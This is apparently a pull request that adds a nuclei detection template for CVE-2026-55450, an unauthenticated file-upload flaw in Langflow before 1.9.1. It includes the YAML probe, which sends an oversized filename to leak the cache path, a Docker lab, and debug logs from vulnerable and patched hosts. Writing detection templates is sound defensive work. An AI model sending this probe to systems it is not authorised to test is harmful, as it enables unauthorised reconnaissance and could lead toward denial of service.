### PR TITLE
Add CVE 2026 55450 Langflow Unauthenticated File Upload

### DIFF
--- a/http/cves/2026/CVE-2026-55450.yaml
+++ b/http/cves/2026/CVE-2026-55450.yaml
@@ -29,7 +29,6 @@ http:
     path:
       - "{{BaseURL}}/api/v1/upload/11111111-1111-1111-1111-111111111111"
 
-    attack: batteringram
     body: |
       --boundary
       Content-Disposition: form-data; name="file"; filename="x.{{repeat('a', 300)}}"

--- a/http/cves/2026/CVE-2026-55450.yaml
+++ b/http/cves/2026/CVE-2026-55450.yaml
@@ -21,7 +21,7 @@ info:
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2026,langflow,file-upload,unauth,dos,exposure
+  tags: cve,cve2026,langflow,file-upload,unauth
 
 
 http:

--- a/http/cves/2026/CVE-2026-55450.yaml
+++ b/http/cves/2026/CVE-2026-55450.yaml
@@ -5,12 +5,11 @@ info:
   author: xtr0nix
   severity: critical
   description: |
-    Langflow versions prior to 1.9.1 expose a deprecated file-upload endpoint (POST /api/v1/upload/{flow_id}) that is missing an authentication check. The flow_id path parameter is not validated against any existing flow or resource ownership, and the endpoint accepts uploads of unbounded size. As a result, any remote, unauthenticated attacker can write arbitrary amounts of data to the server's local cache directory, and the server's JSON response discloses the full absolute filesystem path where the uploaded file was stored.
+   Langflow < 1.9.1 contains an unrestricted file upload caused by lack of upload limitations, letting unauthenticated attackers exhaust server space and leak absolute file paths, exploit requires network access.
   impact: |
-    - Unauthenticated attackers can upload unlimited amounts of data, exhausting server disk space and causing a Denial-of-Service condition.
-    - The server response discloses the absolute filesystem path of the Langflow cache directory, an information leak that can assist in chaining other filesystem-related primitives.
+    Unauthenticated attackers can exhaust server storage and gain information about file paths, potentially aiding further attacks.
   remediation: |
-    Upgrade to Langflow 1.9.1 or later. The patched version requires authentication and flow ownership on this endpoint and enforces the configured max_file_size_upload limit.
+    Update to version 1.9.1 or later.
   reference:
     - https://github.com/langflow-ai/langflow/security/advisories/GHSA-x223-p2gf-v735
   classification:
@@ -21,7 +20,7 @@ info:
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2026,dos,langflow,file-upload,unauth,
+  tags: cve,cve2026,langflow,unauth,intrusive
 
 
 http:

--- a/http/cves/2026/CVE-2026-55450.yaml
+++ b/http/cves/2026/CVE-2026-55450.yaml
@@ -21,7 +21,7 @@ info:
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2026,langflow,file-upload,unauth
+  tags: cve,cve2026,dos,langflow,file-upload,unauth,
 
 
 http:

--- a/http/cves/2026/CVE-2026-55450.yaml
+++ b/http/cves/2026/CVE-2026-55450.yaml
@@ -1,0 +1,49 @@
+id: CVE-2026-55450
+
+info:
+  name: Langflow < 1.9.1 - Unauthenticated File Upload
+  author: xtr0nix
+  severity: critical
+  description: |
+    Langflow versions prior to 1.9.1 expose a deprecated file-upload endpoint (POST /api/v1/upload/{flow_id}) that is missing an authentication check. The flow_id path parameter is not validated against any existing flow or resource ownership, and the endpoint accepts uploads of unbounded size. As a result, any remote, unauthenticated attacker can write arbitrary amounts of data to the server's local cache directory, and the server's JSON response discloses the full absolute filesystem path where the uploaded file was stored.
+  impact: |
+    - Unauthenticated attackers can upload unlimited amounts of data, exhausting server disk space and causing a Denial-of-Service condition.
+    - The server response discloses the absolute filesystem path of the Langflow cache directory, an information leak that can assist in chaining other filesystem-related primitives.
+  remediation: |
+    Upgrade to Langflow 1.9.1 or later. The patched version requires authentication and flow ownership on this endpoint and enforces the configured max_file_size_upload limit.
+  reference:
+    - https://github.com/langflow-ai/langflow/security/advisories/GHSA-x223-p2gf-v735
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:H
+    cvss-score: 9.3
+    cve-id: CVE-2026-55450
+    cwe-id: CWE-306,CWE-400,CWE-200
+  metadata:
+    verified: true
+    max-request: 1
+  tags: cve,cve2026,langflow,file-upload,unauth,dos,exposure
+
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/v1/upload/11111111-1111-1111-1111-111111111111"
+
+    attack: batteringram
+    body: |
+      --boundary
+      Content-Disposition: form-data; name="file"; filename="x.{{repeat('a', 300)}}"
+      Content-Type: text/plain
+
+      probe
+      --boundary--
+    headers:
+      Content-Type: multipart/form-data; boundary=boundary
+
+    matchers:
+      - type: dsl
+        dsl:
+        - status_code == 500
+        - contains(body, "[Errno 36] File name too long")
+        - contains(content_type, "application/json")
+        condition: and

--- a/http/cves/2026/CVE-2026-55450.yaml
+++ b/http/cves/2026/CVE-2026-55450.yaml
@@ -22,7 +22,6 @@ info:
     max-request: 1
   tags: cve,cve2026,langflow,unauth,intrusive
 
-
 http:
   - method: POST
     path:
@@ -41,7 +40,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-        - status_code == 500
-        - contains(body, "[Errno 36] File name too long")
-        - contains(content_type, "application/json")
+          - status_code == 500
+          - contains(body, "[Errno 36] File name too long")
+          - contains(content_type, "application/json")
         condition: and


### PR DESCRIPTION
## PR Information

* Added [CVE-2026-55450](https://github.com/langflow-ai/langflow/security/advisories/GHSA-x223-p2gf-v735): Langflow < 1.9.1 - Unauthenticated File Upload leading to DoS and Path Disclosure
* References:
   * https://nvd.nist.gov/vuln/detail/CVE-2026-55450
   * [GHSA-x223-p2gf-v735](https://github.com/langflow-ai/langflow/security/advisories/GHSA-x223-p2gf-v735)
   * https://github.com/langflow-ai/langflow/pull/12831

## Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

## Additional Details

**Docker lab:**
```yml
version: '3.8'

services:
  langflow-vulnerable:
    image: langflowai/langflow:1.9.0
    container_name: langflow-vulnerable
    restart: always
    ports:
      - 8080:7860

  langflow-patched:
    image: langflowai/langflow:1.9.1
    container_name: langflow-patched
    restart: always
    ports:
      - 8081:7860
```

This template avoids writing any artifact to the target filesystem: it uploads a file with an oversized extension, triggering an OS-level `ENAMETOOLONG` error before the write completes. The resulting error message still leaks the absolute cache path, confirming the endpoint is unauthenticated. On the patched version (1.9.1+), the request is rejected earlier with `403 Forbidden`, so no match occurs.

**Debug data**

```
nuclei -t CVE-2026-55450.yaml -target http://localhost:8080 -duc -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.1

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[VER] Saved 22 templates to metadata cache
[INF] Current nuclei version: v3.7.1 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version:  (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-55450] Dumped HTTP request for http://localhost:8080/api/v1/upload/11111111-1111-1111-1111-111111111111

POST /api/v1/upload/11111111-1111-1111-1111-111111111111 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15
Connection: close
Content-Length: 421
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=boundary
Accept-Encoding: gzip

--boundary
Content-Disposition: form-data; name="file"; filename="x.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
Content-Type: text/plain

probe
--boundary--
[VER] [CVE-2026-55450] Sent HTTP request to http://localhost:8080/api/v1/upload/11111111-1111-1111-1111-111111111111
[DBG] [CVE-2026-55450] Dumped HTTP response http://localhost:8080/api/v1/upload/11111111-1111-1111-1111-111111111111

HTTP/1.1 500 Internal Server Error
Connection: close
Content-Length: 474
Content-Type: application/json
Date: Mon, 13 Jul 2026 10:26:38 GMT
Server: uvicorn

{"detail":"[Errno 36] File name too long: '/app/data/.cache/langflow/11111111-1111-1111-1111-111111111111/ba9c736f19e7f60b7f6764adb0b7908c0a2b394e09b6c09863528c7f2bc86095.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'"}
[CVE-2026-55450:dsl-1] [http] [critical] http://localhost:8080/api/v1/upload/11111111-1111-1111-1111-111111111111
[INF] Scan completed in 8.008146ms. 1 matches found.



nuclei -t CVE-2026-55450.yaml -target http://localhost:8081 -duc -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.1

		projectdiscovery.io

[VER] Started metrics server at localhost:9092
[VER] Saved 22 templates to metadata cache
[INF] Current nuclei version: v3.7.1 (unknown) - remove '-duc' flag to enable update checks
[INF] Current nuclei-templates version:  (unknown) - remove '-duc' flag to enable update checks
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 0
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2026-55450] Dumped HTTP request for http://localhost:8081/api/v1/upload/11111111-1111-1111-1111-111111111111

POST /api/v1/upload/11111111-1111-1111-1111-111111111111 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15
Connection: close
Content-Length: 421
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=boundary
Accept-Encoding: gzip

--boundary
Content-Disposition: form-data; name="file"; filename="x.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
Content-Type: text/plain

probe
--boundary--
[VER] [CVE-2026-55450] Sent HTTP request to http://localhost:8081/api/v1/upload/11111111-1111-1111-1111-111111111111
[DBG] [CVE-2026-55450] Dumped HTTP response http://localhost:8081/api/v1/upload/11111111-1111-1111-1111-111111111111

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 51
Content-Type: application/json
Date: Mon, 13 Jul 2026 10:26:42 GMT
Server: uvicorn

{"detail":"No authentication credentials provided"}
[INF] Scan completed in 9.641504ms. No results found.
```